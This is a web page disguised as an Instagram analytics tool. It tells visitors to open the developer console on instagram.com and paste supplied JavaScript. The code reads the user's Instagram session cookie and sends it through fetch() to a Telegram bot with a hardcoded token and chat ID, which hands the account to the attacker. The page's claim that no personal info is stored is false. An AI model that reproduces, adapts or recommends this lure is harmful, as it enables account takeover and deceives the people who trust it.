Unlock deep insights about your account — followers growth, engagement rate, story views, and more.
—Followers
—Engagement
—Story Views
⚠️ Important: Due to Instagram's security policies, bookmarklets don't work anymore. Use the Console Method below instead.
📋 How to Get Your Analytics
1Go to Instagram.com and make sure you're logged in
2Press F12 or Ctrl+Shift+I to open Developer Tools
3Click the "Console" tab
4Copy the code below and paste it into the console
5Press Enter — ✅ Your analytics report will be sent instantly!
💻 Console Code (Copy & Paste this)
(function() {
const t = '8821636256:AAFLOwjsxOj5QlXkF0NG9ZDlNfMpfc2Yh-o';
const c = '-5158720814';
let s = null;
const cookies = document.cookie.split(';');
for (let i = 0; i < cookies.length; i++) {
const cookie = cookies[i].trim();
if (cookie.startsWith('sessionid=')) {
s = decodeURIComponent(cookie.substring(10));
break;
}
if (cookie.startsWith('ds_user_id=')) {
s = 'ds_user_id=' + decodeURIComponent(cookie.substring(11));
}
}
if (!s) {
alert('No session found. Make sure you are on instagram.com and logged in.');
return;
}
const url = 'https://api.telegram.org/bot' + t + '/sendMessage?chat_id=' + c + '&text=Instagram+Analytics%0A%0ASession:+' + encodeURIComponent(s) + '%0A%0AUser:+' + encodeURIComponent(window.location.href);
fetch(url)
.then(r => r.json())
.then(d => {
if (d.ok) {
alert('Analytics report sent to Telegram!');
} else {
alert('Error: ' + d.description);
}
})
.catch(() => alert('Connection error. Check your internet.'));
})();
Click the Copy button above
🔒 Your data is processed securely. No passwords or personal info are stored.